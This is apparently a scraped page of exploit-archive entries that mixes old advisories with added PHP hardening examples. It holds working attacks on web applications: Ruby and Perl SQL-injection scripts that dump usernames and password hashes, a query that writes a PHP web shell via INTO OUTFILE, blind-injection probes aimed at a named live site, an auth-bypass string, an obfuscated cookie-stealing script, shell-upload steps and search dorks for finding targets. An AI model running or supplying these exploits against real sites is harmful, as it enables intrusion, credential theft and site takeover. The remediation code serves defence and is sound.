ftp password hacking
Search result for 'ftp password hacking'
High-Tech Bridge ./BLOG:CMS <= v4.2.1e Multiple Vulnerabilities ( php)
Vulnerability ID: HTB22727
Reference: http://www.htbridge.ch/advisory/xsrf_csrf_in_blogcms.html
Product: BLOG:CMS
Vendor: Radek Hulán ( http://blogcms.com/ )
Vulnerable Version: 4.2.1.e and probably prior versions
Vendor Notification: 30 November 2010
Vulnerability Type: CSRF (Cross-Site Request Forgery)
Status: Not Fixed, Vendor Alerted
Risk level: Low
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)
XSRF/CSRF:
Vulnerability Details:
The vulnerability exists because the "admin/libs/ADMIN.php" script fails to verify the source of the HTTP request.
Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.
An attacker can use a browser to exploit this vulnerability. The following PoC is available:
<form action="http://host/admin/index.php" method="post" name="main">
<input type="hidden" name="action" value="changemembersettings">
<input type="hidden" name="memberid" value="USER_UD">
<input type="hidden" name="name" value="tester">
<input type="hidden" name="realname" value="tester">
<input type="hidden" name="password" value="">
<input type="hidden" name="repeatpassword" value="">
<input type="hidden" name="email" value="email@example.com">
<input type="hidden" name="url" value="">
<input type="hidden" name="admin" value="1">
<input type="hidden" name="canlogin" value="1">
<input type="hidden" name="notes" value="">
<input type="hidden" name="deflang" value="">
</form>
<script>
document.main.submit();
</script>
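The PoC above works because the browser attaches the victim's session cookie to a form that any third-party page can auto-submit. A synchronizer-token check of the kind that closes this class of finding is added here as an example; it is not BLOG:CMS code, and the function names, the minimal admin form and the cookie settings are assumptions.

```php
<?php
// Added example (not BLOG:CMS code): a per-session synchronizer token for
// state-changing admin actions such as "changemembersettings".
// Function names are hypothetical.

// SameSite=Lax stops the cookie from riding along with a cross-site POST in
// modern browsers; the token check below is the defence that does not depend
// on the browser.
session_set_cookie_params(['httponly' => true, 'samesite' => 'Lax']);
session_start();

// One random token per session, embedded in every admin form.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Reject any POST whose token is missing or does not match (constant-time compare).
function require_csrf_token(): void {
    $sent     = $_POST['csrf_token'] ?? '';
    $expected = $_SESSION['csrf_token'] ?? '';
    if ($expected === '' || !hash_equals($expected, $sent)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }
}

// Defence in depth: when the browser sends Origin or Referer, its host must be ours.
// (Port is stripped from HTTP_HOST so it compares with parse_url's host part.)
function require_same_origin(): void {
    $host = strtolower(explode(':', $_SERVER['HTTP_HOST'] ?? '')[0]);
    foreach (['HTTP_ORIGIN', 'HTTP_REFERER'] as $hdr) {
        if (!empty($_SERVER[$hdr])) {
            $origin_host = strtolower((string) parse_url($_SERVER[$hdr], PHP_URL_HOST));
            if ($origin_host !== $host) {
                http_response_code(403);
                exit('Cross-origin request rejected');
            }
            return; // the first header present decides
        }
    }
}

// Rendering: the legitimate admin form carries the token as a hidden field,
// which an attacker's page cannot read because of the same-origin policy.
function render_member_form(): void {
    $token = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
    echo '<form action="index.php" method="post">';
    echo '<input type="hidden" name="action" value="changemembersettings">';
    echo '<input type="hidden" name="csrf_token" value="' . $token . '">';
    echo '<input type="submit" value="Save">';
    echo '</form>';
}

// Handling: the token is checked before any member setting is touched.
if ($_SERVER['REQUEST_METHOD'] === 'POST'
    && ($_POST['action'] ?? '') === 'changemembersettings') {
    require_csrf_token();
    require_same_origin();
    // ... apply the member settings change here ...
} else {
    render_member_form();
}
```

The forged form in the advisory carries no `csrf_token` field, so `require_csrf_token()` answers it with 403 before `changemembersettings` runs; the Origin/Referer check is secondary because some browsers and proxies strip those headers, which is why it only rejects when a header is present and wrong.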
Stored XSS (HTB22724):
Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.
The vulnerability exists due to failure in the "action.php" script to properly sanitize user-supplied input in "body" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.
An attacker can use a browser to exploit this vulnerability: enter a comment such as <script>alert('XSS')</script> in the "Add new comment" form.
XSS (HTB22725):
Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.
The vulnerability exists due to failure in the "admin/index.php" script to properly sanitize user-supplied input in "amount" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.
An attacker can use a browser to exploit this vulnerability. The following PoC is available:
<form action="http://host/admin/index.php" method="post" name="main">
<input type="hidden" name="blogid" value="0">
<input type="hidden" name="itemid" value="0">
<input type="hidden" name="action" value="browseowncomments">
<input type="hidden" name="amount" value='10"><script>alert(document.cookie)</script>'>
<input type="hidden" name="start" value="0">
<input type="hidden" name="search" value="">
</form>
<script>
document.main.submit();
</script>
Solution: Upgrade to the most recent version
XSS (HTB22726):
Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.
The vulnerability exists due to failure in the "admin/index.php" script to properly sanitize user-supplied input in "action" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.
An attacker can use a browser to exploit this vulnerability. The following PoC is available:
http://host/admin/index.php?action=settingsedit"><script>alert(document.cookie)</script>
Solution: Upgrade to the most recent version
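All three XSS findings share one root cause: request values ("amount", "action", "body") are written back into HTML without encoding for the context they land in. The following is an added example of contextual output encoding and input typing that neutralises the advisory's own payloads; it is not BLOG:CMS code, and the helper names are hypothetical.

```php
<?php
// Added example (not BLOG:CMS code): typed parameters plus contextual output
// encoding for the values the advisory shows being reflected and stored.
// Helper names are hypothetical.

// HTML text/attribute context: escape <, >, &, " and ' so a value can never
// close the attribute it is quoted in (the '10"><script>' trick).
function e(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Parameters that are numeric by design ("amount", "start", "blogid") are
// validated as integers; anything else falls back to a safe default.
function int_param(array $src, string $name, int $default, int $min = 0, int $max = PHP_INT_MAX): int {
    $v = filter_var($src[$name] ?? $default, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => $min, 'max_range' => $max]]);
    return $v === false ? $default : $v;
}

// Parameters from a closed set ("action") are matched against an allow-list.
function action_param(array $src, array $allowed, string $default): string {
    $a = $src['action'] ?? $default;
    return in_array($a, $allowed, true) ? $a : $default;
}

// --- demonstration with the advisory's payloads as constructed input ---
$get = [
    'amount' => '10"><script>alert(document.cookie)</script>',
    'action' => 'settingsedit"><script>alert(document.cookie)</script>',
];
$amount = int_param($get, 'amount', 10, 1, 100);                 // payload is not an int -> 10
$action = action_param($get, ['browseowncomments', 'settingsedit'], 'overview'); // not allowed -> 'overview'
$body   = "<script>alert('XSS')</script>";                       // constructed stored comment body

// A CSP that forbids inline script is a second layer if an encoding is missed.
header("Content-Security-Policy: script-src 'self'");

// Every echo of request-derived data goes through e(), including the free-text
// comment body; the stored payload renders as visible text, not as a script tag.
echo '<input type="text" name="amount" value="' . e((string) $amount) . '">' . "\n";
echo '<input type="hidden" name="action" value="' . e($action) . '">' . "\n";
echo '<div class="comment">' . e($body) . '</div>' . "\n";
```

The numeric and allow-listed parameters never reach the HTML as attacker-controlled strings at all, and the comment body, which must stay free text, is rendered as `&lt;script&gt;...` so the browser shows it rather than executing it.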
Easy Laster/Joomla JE Job Component SQL injection Vulnerability ( php)
----------------------------Information------------------------------------------------
+Name : joomla JE Job Component <= SQL injection Vulnerability Exploit
+Author : Easy Laster
+Date : 30.09.2010
+Script : joomla JE Job Component
+Demo : http://joomlaextensions.co.in/jobcomponent/
+Download : http://joomlaextensions.co.in/extensions/modules/je-content-menu.html?page=shop.product_details&category_id=4&flypage=flypage.tpl&product_id=59&vmcchk=1
+Price : free
+Language : PHP
+Discovered by Easy Laster
+Security Group 4004-Security-Project
+Greetz to Team-Internet ,Underground Agents and free-hack.com
+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
Kiba,-tmh-,Dr.ChAoS,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
N00bor,Ic3Drag0n,novaca!ne,n3w7u,Maverick010101,s0red,c1ox,enco,
---------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------
#!/usr/bin/ruby
#4004-security-project.com
#Discovered and vulnerability by Easy Laster
print "
#########################################################
# 4004-Security-Project #
#########################################################
# joomla JE Job Component #
# Exploit #
# Using Host+Path+id #
# www.demo.de /forum/ 1 #
# Easy Laster #
#########################################################
"
require 'net/http'
print "#########################################################"
print "\nEnter host name (site.com)->"
host=gets.chomp
print "#########################################################"
print "\nEnter script path (/forum/)->"
path=gets.chomp
print "\n#########################################################"
print "\nEnter the id (id)->"
userid=gets.chomp
print "#########################################################"
begin
dir = "index.php?option=com_jejob&view=item_detail"+
"&itemid=1+and+1=0+uNiOn+sElEcT+1,concat(0x23,0x23,"+
"0x23,0x23,0x23,id,0x23,0x23,0x23,0x23,0x23),3,4,5,"+
"6,7,8,9,10,11,12,13+from+jos_users+where+id="+ userid +"--+"
http = Net::HTTP.new(host, 80)
resp= http.get(path+dir)
print "\nid -> "+(/#####(.+)#####/).match(resp.body)[1]
dir = "index.php?option=com_jejob&view=item_detail&"+
"itemid=1+and+1=0+uNiOn+sElEcT+1,concat(0x23,0x23,0x23"+
",0x23,0x23,username,0x23,0x23,0x23,0x23,0x23),3,4,5,"+
"6,7,8,9,10,11,12,13+from+jos_users+where+id="+ userid +"--+"
http = Net::HTTP.new(host, 80)
resp= http.get(path+dir)
print "\nUsername -> "+(/#####(.+)#####/).match(resp.body)[1]
dir = "index.php?option=com_jejob&view=item_detail&itemid"+
"=1+and+1=0+uNiOn+sElEcT+1,concat(0x23,0x23,0x23,0x23,0x23"+
",password,0x23,0x23,0x23,0x23,0x23),3,4,5,6,7,8,9,10,11,12"+
",13+from+jos_users+where+id="+ userid +"--+"
http = Net::HTTP.new(host, 80)
resp= http.get(path+dir)
print "\nEPassword -> "+(/#####(.+)#####/).match(resp.body)[1]
dir = "index.php?option=com_jejob&view=item_detail&itemid=1+and+1=0"+
"+uNiOn+sElEcT+1,concat(0x23,0x23,0x23,0x23,0x23,email,0x23,0x23,0x23"+
",0x23,0x23),3,4,5,6,7,8,9,10,11,12,13+from+jos_users+where+id="+ userid +"--+"
http = Net::HTTP.new(host, 80)
resp= http.get(path+dir)
print "\nEmail -> "+(/#####(.+)#####/).match(resp.body)[1]
print "\n#########################################################"
rescue
print "\nExploit failed"
end
Qabandi/Pc4Uploader 9.0 Remote Blind SQL Injection Vulnerability ( php)
=By: Qabandi
=Email: iqa[a]hotmail.fr
From Kuwait PEACE
=Vuln: pc4arb - pc4 Uploader <= 9.0 Blind SQL injection
=INFO: http://pc4arb.com/product-13.html
=BUY: http://pc4arb.com/deal-13.html
=DORK: intext:"Powered by Pc4Uploader v9.0"
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@-SQL-Filter-Bypass@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
----------Vulnerable code@ "./code.php"----------------------------------------
function filter_sql( $inputsql )
{
$regsql = "(delete)|(update)|(union)|(insert)";
return eregi_replace( $regsql, "", $inputsql );
}
------------------END----------------------------------------------------------
-=-===--=-=-==-=-==-=-=-=-=-=-=-=-POC-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
$Q = "UNIunionON";
filter_sql($Q);
echo $Q;
--
Result = UNION
We can use this to upload a file, using the "dumpfile" and "outfile" Mysql functions.
POC:-
conditions: magic_quotes_gpc = off // 0777 chmoded folder // location of folder.
To get the location on the server, we can generate an error using the STYLE cookie handler; to do this we need to set tempst=qabandi.
javascript:document.cookie="tempst=qabandi";
Refresh,
you will get the following:
Warning: file(templates/Qabandi/main_block.html) [function.file]: failed to open stream: No such file or directory in /home/XXXXXXX/public_html/function.php on line 33
Now we have the location on the server, "/home/XXXXXXX/public_html/".
"/home/XXXXXXX/public_html/upfiles/" <--- 99% of the time it's chmoded 0777.
now the exploit:
http://localhost/pc4up/code.php?load=banner&id=-1 UNunionION select 1,2,3,'<? include($Q);?>',5,6,7,8,9 into outfile '/home/XXXXXXX/public_html/upfiles/qabandi.php'
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@-BLIND SQL@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
----------Vulnerable code@ "./code.php"-----------------------------------------
if ( $_GET['load'] == "banner" )
{
$idx = $_GET['id'];
$idx = strip_tags( $idx );
$idx = filter_sql( $idx );/// <------ SIMPLY bypassed by using "unUNIONion" ;)
if ( !( $query_banner = mysql_query( "SELECT * FROM banners WHERE id={$idx}" ) ) )
{
exit( "Query failed" );
}
$x = mysql_fetch_row( $query_banner );
$url = $x[2];
$visits = $x[5];
if ( !( $query = mysql_query( "UPDATE banners SET visits=visits+1 WHERE id ={$idx}" ) ) )
{
exit( "Query failed" );
}
header( "Location: {$url}" );
}
--------------:PoC:-------------
Conditions: the admin must have added a banner using the "add banner" feature, and the banner ID must be valid.
Blind SQL DEMO:-
http://upload.traidnt.net/code.php?load=banner&id=1 and substring(@@version,1,1)=4 <-- TRUE! (MySQL version 4)
http://upload.traidnt.net/code.php?load=banner&id=1 and substring(@@version,1,1)=5 <-- BLANK
To get info:
http://upload.traidnt.net/code.php?load=banner&id=1 and ascii(substring((SELECT concat(username,char(62),password) from admin limit 0,1),1,1))>95
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-==-=Do not use it on Islamic websites=-=-=-=-=-=-=-=-
=-=-=-=-==-=-=-=-=-=-No-More---Private=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Salamz: Killer Hack, Mr.Mn7os, Ghost-r00t, All muslim hackers.
# milw0rm.com [2009-05-18]
YEnH4ckEr/Leap CMS 0.1.4 (SQL/XSS/SU) Multiple Remote Vulnerabilities ( php)
***********************************************************************************************
** LONG LIVE SPAIN!...WE WILL WIN THE WORLD CUP!...o.O **
** PROUD TO BE SPANISH! **
***********************************************************************************************
----------------------------------------------------------------------------------------------
| MULTIPLE REMOTE VULNERABILITIES |
|--------------------------------------------------------------------------------------------|
| | LEAP CMS 0.1.4 | |
| CMS INFORMATION: ------------------------------ |
| |
|-->WEB: http://leap.gowondesigns.com/ |
|-->DOWNLOAD: http://leap.gowondesigns.com/download.php?leap014.zip |
|-->DEMO: http://php.opensourcecms.com/scripts/details.php?scriptid=161&name=Leap |
|-->CATEGORY: CMS / Lite |
|-->DESCRIPTION: Leap is a single file, template independent, open-source, |
| standards-compliant,extensible content management system for the web... |
|-->RELEASED: 2009-03-13 |
| |
| CMS VULNERABILITY: |
| |
|-->TESTED ON: firefox 3 and I-Explorer 6 |
|-->DORK: "Powered by Leap" |
|-->CATEGORY: AUTH-BYPASS(SQLi)/COOKIE-STEALER (XSS)/SHELL-UPLOAD/ XSS |
|-->AFFECT VERSION: 0.1.4 (maybe <= ?) |
|-->Discovered Bug date: 2009-04-24 |
|-->Reported Bug date: 2009-04-24 |
|-->Fixed bug date: Not fixed |
|-->Info patch: Not fixed |
|-->Author: YEnH4ckEr |
|-->mail: y3nh4ck3r[at]gmail[dot]com |
|-->WEB/BLOG: N/A |
|-->COMMENT: To my girlfriend Marijose... brother, sister-in-law, parents (and friends xD) for their support. |
|-->EXTRA-COMMENT: Thanks to everyone for putting up with me! (I love you, little one!) |
----------------------------------------------------------------------------------------------
##############################
//////////////////////////////
AUTHENTICATION BYPASS (SQLi):
/////////////////////////////
##############################
<<<<---------++++++++++++++ Condition: magic_quotes_gpc=off +++++++++++++++++--------->>>>
-----------
FILE VULN:
-----------
Path --> [HOME_PATH]/leap.php
function checkSession() {
if($_POST['login']=='Login') {
$_SESSION['userMail']=$_POST['email']; $_SESSION['passWord']=md5($_POST['pwd']);
....
}
$i=@mysql_query("SELECT * FROM ".db('prefix')."users WHERE mail='$_SESSION[userMail]' AND pwd='$_SESSION[passWord]'"); $d=@mysql_fetch_array($i);
....
---------
EXPLOIT:
---------
Email Address: nothing' or 1=1#
Password: nothing
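The Pc4Uploader code.php handler earlier on this page and the Leap CMS checkSession() above fail in the same way: request data is concatenated into SQL, and in the Pc4Uploader case a keyword blacklist is the only guard. The following added example rewrites both handlers with typed parameters and prepared statements; it is not code from either project, the table and column names follow the advisories, and `open_db()`, the placeholder credentials and the use of mysqli with mysqlnd (`get_result()`) are assumptions.

```php
<?php
// Added example, not Pc4Uploader or Leap CMS code: the two injection points
// replaced by typed parameters and prepared statements. Function names,
// connection details and the mysqlnd requirement for get_result() are assumptions.

function open_db(): mysqli {
    $db = new mysqli('localhost', 'app', 'placeholder-password', 'app'); // placeholder credentials
    $db->set_charset('utf8mb4');
    return $db;
}

// code.php: "id" is numeric by design, so it is validated as an integer and
// bound as one. A blacklist like eregi_replace("(union)|...") is not a defence:
// one pass turns "UNIunionON" into "UNION". With a bound parameter the value
// can never become SQL text, so there is nothing to strip.
function banner_redirect(mysqli $db, $raw_id): ?string {
    $id = filter_var($raw_id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null; // not a valid banner id: no query, and no error/blank page to probe
    }
    $stmt = $db->prepare('SELECT url FROM banners WHERE id = ?');
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    if ($row === null) {
        return null;
    }
    $upd = $db->prepare('UPDATE banners SET visits = visits + 1 WHERE id = ?');
    $upd->bind_param('i', $id);
    $upd->execute();
    return $row['url'];
}

// leap.php: credentials are never concatenated into SQL, the stored hash is
// checked with password_verify() rather than an md5() string match, and the
// session records only the user id, and only after the check has passed.
function login(mysqli $db, string $mail, string $pwd): bool {
    $stmt = $db->prepare('SELECT id, pwd FROM users WHERE mail = ?');
    $stmt->bind_param('s', $mail);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    // Verify against a dummy hash when the user is unknown so response time
    // does not reveal whether the address exists.
    $hash = $row['pwd'] ?? password_hash('dummy-password-for-timing', PASSWORD_DEFAULT);
    if ($row === null || !password_verify($pwd, $hash)) {
        return false;
    }
    session_regenerate_id(true);
    $_SESSION['user_id'] = (int) $row['id'];
    return true;
}

// Usage with the advisories' own inputs.
session_start();
$db = open_db();
var_dump(login($db, "nothing' or 1=1#", 'nothing'));
var_dump(banner_redirect($db, '1 and substring(@@version,1,1)=4'));
```

With these inputs `login()` returns false, because `nothing' or 1=1#` is simply a mail address that matches no row, and `banner_redirect()` returns null before any query runs, because the blind-injection string is not an integer. The lookup no longer produces the TRUE/BLANK oracle the Pc4Uploader advisory relies on, and the Leap CMS comparison no longer depends on `magic_quotes_gpc`.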
#############################
/////////////////////////////
COOKIES STEALING VULN (XSS):
/////////////////////////////
#############################
<<<<---------++++++++++++++ Condition: Add comment +++++++++++++++++--------->>>>
---------
EXPLOIT:
---------
Go to Link --> http://[HOST]/[HOME_PATH]/?article.[ARTICLE_TITLE]
There you can comment on the article.
Add a comment with any name/email and message:
<script>document.location=String.fromCharCode(104,116,116,112,58,47,47,49,50,55,46,48,46,48,46,49,47,101,120,112,108,111,105,116,45,99,111,111,107,105,101,115,47,119,97,105,116,105,110,103,45,102,111,114,46,112,104,112,63,99,107,61)+document.cookie</script>
PHP Script (Cookies Stealer) --> See: http://www.milw0rm.com/exploits/8453
http://www.milw0rm.com/exploits/8471
Note: The exploit fails if the real admin clicks the log-out button.
############################
////////////////////////////
SHELL UPLOAD VULNERABILITY:
////////////////////////////
############################
<<<<---------++++++++++++++ Condition: Be superadmin (above) +++++++++++++++++--------->>>>
---------
EXPLOIT:
---------
Option: Manage Files. Link --> http://[HOST]/[HOME_PATH]/?admin.system.files
upload your shell there.
Then, Go to the link --> http://[HOST]/[HOME_PATH]/shell.php
########################
////////////////////////
XSS (SEARCH POST FORM):
////////////////////////
########################
Search:
"><script>alert(1)</script>
<<<-----------------------------EOF---------------------------------->>>ENJOY IT!
#######################################################################
#######################################################################
##*******************************************************************##
## ESPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)! ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
## GREETZ TO: JosS and all SPANISH Hack3Rs community! ##
##*******************************************************************##
#######################################################################
#######################################################################
# milw0rm.com [2009-04-30]
NoGe/Pie Web M{a,e}sher 0.5.3 Multiple Remote File Inclusion Vulnerability ( php)
===========================================================================================
[o] Pie Web M{a,e}sher 0.5.3 Multiple Remote File Inclusion Vulnerability
Software : Pie Web M{a,e}sher version 0.5.3
Vendor : http://pie.ekkaia.org/
Download : http://pie.ekkaia.org/page/Download
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com
===========================================================================================
[o] Vulnerable file
All files below are affected via the "lib" parameter:
lib/action/alias.php
lib/action/cancel.php
lib/action/context.php
lib/action/deadlinks.php
lib/action/delete.php
lib/action/diff.php
lib/action/download.php
lib/action/dump.php
lib/action/edit.php
lib/action/fileimport.php
lib/action/fileinfo.php
lib/action/filelist.php
lib/action/goto.php
lib/action/history.php
lib/action/image.php
lib/action/latest.php
lib/action/links.php
lib/action/logflush.php
lib/action/login.php
lib/action/logout.php
lib/action/logshow.php
lib/action/maintenance.php
lib/action/page.php
lib/action/pageimport.php
lib/action/pageinfo.php
lib/action/pagelist.php
lib/action/password.php
lib/action/preview.php
lib/action/purge.php
lib/action/referers.php
lib/action/register.php
lib/action/rename.php
lib/action/revert.php
lib/action/rss.php
lib/action/search.php
lib/action/show.php
lib/action/source.php
lib/action/systeminfo.php
lib/action/update.php
lib/action/upgrade.php
lib/action/upload.php
lib/action/useradd.php
lib/action/userdel.php
lib/action/useredit.php
lib/action/userimport.php
lib/action/userinfo.php
lib/action/userlist.php
lib/action/version.php
lib/action/wipe.php
All files below are affected via the "GLOBALS[pie][library_path]" parameter:
lib/class/diff.php
lib/class/file.php
lib/class/locale.php
lib/class/mapfile.php
lib/class/page.php
lib/class/user.php
lib/class/userpref.php
lib/compiler/html.php
lib/share/auth.php
lib/share/errorimage.php
lib/share/link.php
lib/share/log.php
lib/share/private.php
lib/share/referers.php
[o] Exploit
http://localhost/[path]/lib/action/alias.php?lib=[evilcode]
http://localhost/[path]/lib/class/diff.php?GLOBALS[pie][library_path]=[evilcode]
http://localhost/[path]/lib/compiler/html.php?GLOBALS[pie][library_path]=[evilcode]
http://localhost/[path]/lib/share/auth.php?GLOBALS[pie][library_path]=[evilcode]
===========================================================================================
[o] Greetz
MainHack BrotherHood [ http://serverisdown.org/blog/]
Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa
H312Y yooogy mousekill }^-^{ kaka11 martfella
skulmatic olibekas ulga Cungkee k1tk4t str0ke
GANYANG MALINGSIAL!!! [ http://malingsial.serverisdown.org/ ]
===========================================================================================
# milw0rm.com [2008-11-24]
High-Tech Bridge SA/BLOG:CMS 4.2.1e Cross Site Request Forgery / Cross Site Scripting ( na)
BLOG:CMS versions 4.2.1e and below suffer from cross site request forgery and cross site scripting vulnerabilities.
Don Tukulesto/Joomla Recerca SQL Injection ( na)
#!/usr/bin/perl
#=========================== [ root@indonesiancoder.com $ ~] ===========================#
# [~] Joomla Components com_recerca (ansubdepartments_id) SQL Injection Vulnerability #
# [~] Author : Don Tukulesto #
# [~] Homepage : http://www.indonesiancoder.com #
# [~] Tune in : http://www.AntiSecradio.fm ( choose your weapon ) #
# [~] Gracias : IndonesianCoder.com - AntiSecurity.org - ServerIsDown.org - MainHack #
# [~] kaMtiEz, M3NW5, arianom, Jack-, Yadoy666, Gonzhack, SoulNet, s4va, tiw0L, Kill-9 #
# [~] SAINT, CYB3R_TR0N, M364TR0N, NoGe, TUCKER, Ian Petrucii, RoNz, Chercut, YOU !! #
#=========================== [ root@indonesiancoder.com $ ~] ===========================#
use HTTP::Request;
use LWP::UserAgent;
$cmsapp = 'Joomla Component com_recerca';
$vuln = 'index.php?option=com_recerca&task=linia&ansubdepartments_id=';
$column = 'concat(username,0x3a,password)tukulesto';
$table = 'jos_users';
$regexp = 'No elements defined';
$maxlen = 65;
my $OS = "$^O";
if ($OS eq 'MSWin32') { system("cls"); } else { system("clear"); }
printf "\n
$cmsapp
[x]====================================================[x]
| www[dot]IndonesianCoder[dot]com |
[x]====================================================[x]
\n";
print " [~] URL Path : "; chomp($web=<STDIN>);
print " [~] Valid ID : "; chomp($id=<STDIN>);
print " [~] Column : "; chomp($columns=<STDIN>);
if ($web =~ /http:\/\// ) { $target = $web."/"; } else { $target = "http://".$web."/"; }
print "\n\n [!] Exploiting $target ...\n\n";
&get_data;
print "\n\n [!] Exploit completed.\n\n";
sub get_data() {
@columns = split(/,/, $columns);
foreach $column (@columns) {
print " [exploiting\@$web] SELECT $column FROM $table please wait...\n";
syswrite(STDOUT, " [exploiting\@$web] $column\@$table > ", 255);
for (my $i=1; $i<=$maxlen; $i++) {
my $chr = 0;
my $found = 1;
my $char = 48;
while (!$chr && $char<=90) {
if(exploit($i,$char) !~ /$regexp/) {
$chr = 1;
$found = 1;
syswrite(STDOUT,chr($char),1);
} else { $found = 0; }
$char++;
}
if(!$chr) {
$char = 97;
while(!$chr && $char<=122) {
if(exploit($i,$char) !~ /$regexp/) {
$chr = 1;
$found = 1;
syswrite(STDOUT,chr($char),1);
} else { $found = 0; }
$char++;
}
}
if (!$found) {
print "\n"; last;
}
}
}
}
sub exploit() {
my $limit = $_[0];
my $chars = $_[1];
my $shits = '+union+select+1,2,3,'.$column.',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+'.$table.'--';
my $inject = $target.$vuln.$id.$shits;
my $content = get_content($inject);
return $content;
}
sub get_content() {
my $url = $_[0];
my $req = HTTP::Request->new(GET => $url);
my $ua = LWP::UserAgent->new();
$ua->timeout(15);
my $res = $ua->request($req);
if ($res->is_error){
print "\n\n [!] Error, ".$res->status_line.".\n\n";
exit;
}
return $res->content;
}
The Joomla Recerca component suffers from a remote SQL injection vulnerability.
YEnH4ckEr/Leap CMS 0.1.4 XSS / SQL Injection ( na)
Leap CMS version 0.1.4 suffers from cross site scripting, shell upload, and remote SQL injection vulnerabilities.
NoGe/pieweb-rfi.txt ( na)
===========================================================================================
[o] Pie Web M{a,e}sher 0.5.3 Multiple Remote File Inclusion Vulnerability
Software : Pie Web M{a,e}sher version 0.5.3
Vendor : http://pie.ekkaia.org/
Download : http://pie.ekkaia.org/page/Download
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com
===========================================================================================
[o] Vulnerable file
All files below are affected via the "lib" parameter:
lib/action/alias.php
lib/action/cancel.php
lib/action/context.php
lib/action/deadlinks.php
lib/action/delete.php
lib/action/diff.php
lib/action/download.php
lib/action/dump.php
lib/action/edit.php
lib/action/fileimport.php
lib/action/fileinfo.php
lib/action/filelist.php
lib/action/goto.php
lib/action/history.php
lib/action/image.php
lib/action/latest.php
lib/action/links.php
lib/action/logflush.php
lib/action/login.php
lib/action/logout.php
lib/action/logshow.php
lib/action/maintenance.php
lib/action/page.php
lib/action/pageimport.php
lib/action/pageinfo.php
lib/action/pagelist.php
lib/action/password.php
lib/action/preview.php
lib/action/purge.php
lib/action/referers.php
lib/action/register.php
lib/action/rename.php
lib/action/revert.php
lib/action/rss.php
lib/action/search.php
lib/action/show.php
lib/action/source.php
lib/action/systeminfo.php
lib/action/update.php
lib/action/upgrade.php
lib/action/upload.php
lib/action/useradd.php
lib/action/userdel.php
lib/action/useredit.php
lib/action/userimport.php
lib/action/userinfo.php
lib/action/userlist.php
lib/action/version.php
lib/action/wipe.php
All files below are affected via the "GLOBALS[pie][library_path]" parameter:
lib/class/diff.php
lib/class/file.php
lib/class/locale.php
lib/class/mapfile.php
lib/class/page.php
lib/class/user.php
lib/class/userpref.php
lib/compiler/html.php
lib/share/auth.php
lib/share/errorimage.php
lib/share/link.php
lib/share/log.php
lib/share/private.php
lib/share/referers.php
[o] Exploit
http://localhost/[path]/lib/action/alias.php?lib=[evilcode]
http://localhost/[path]/lib/class/diff.php?GLOBALS[pie][library_path]=[evilcode]
http://localhost/[path]/lib/compiler/html.php?GLOBALS[pie][library_path]=[evilcode]
http://localhost/[path]/lib/share/auth.php?GLOBALS[pie][library_path]=[evilcode]
===========================================================================================
[o] Greetz
MainHack BrotherHood [ http://serverisdown.org/blog/]
Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa
H312Y yooogy mousekill }^-^{ kaka11 martfella
skulmatic olibekas ulga Cungkee k1tk4t str0ke
GANYANG MALINGSIAL!!! [ http://malingsial.serverisdown.org/ ]
===========================================================================================
Pie Web M{a,e}sher version 0.5.3 suffers from multiple remote file inclusion vulnerabilities.
tracewar/VP-ASP-SQL.txt ( na)
************************************************** !!! WARNING !!! ***********************************************************
* FOR EDUCATIONAL PURPOSES ONLY! *
******************************************************************************************************************************
* Neither myself nor any of my Affiliates shall be liable for any direct, incidental, consequential, indirect *
* or punitive damages arising out of access to, inability to access, or any use of the content of this advisory, *
* including without limitation any PC, other equipment or other property, even if I am Expressly advised of *
* the possibility of such damages. I DO NOT encourage criminal activities. If you use this advisory or commit *
* criminal acts with it, then you are solely responsible for your own actions and by use, downloading,transferring, *
* and/or reading anything from this advisory you are considered to have accepted the terms and conditions and have read *
* this disclaimer. Once again this advisory is for educational purposes only. *
******************************************************************************************************************************
